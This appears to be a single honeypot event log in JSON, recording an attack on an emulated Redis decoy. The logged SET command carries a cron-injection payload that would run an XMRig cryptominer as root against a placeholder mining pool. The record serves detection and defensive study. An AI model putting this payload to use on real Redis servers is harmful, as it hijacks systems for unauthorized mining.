{
  "event_id": "atk-redis-02",
  "ts": 1792285330150,
  "decoy_id": "dcy-redis-1",
  "catalogue_id": "emulator/redis/7.0",
  "decoy_kind": "emulation",
  "channel": "application",
  "severity": "medium",
  "src": { "ip": "198.51.100.23", "port": 40001 },
  "dst": { "ip": "10.85.1.10", "port": 6379 },
  "attempt_id": "atm-redis-1",
  "data": {
    "protocol": "redis",
    "command": "SET",
    "args": ["backup1", "\n\n*/5 * * * * root /tmp/.x/XMRig -o stratum+tcp://pool.example.invalid:3333\n\n"]
  }
}
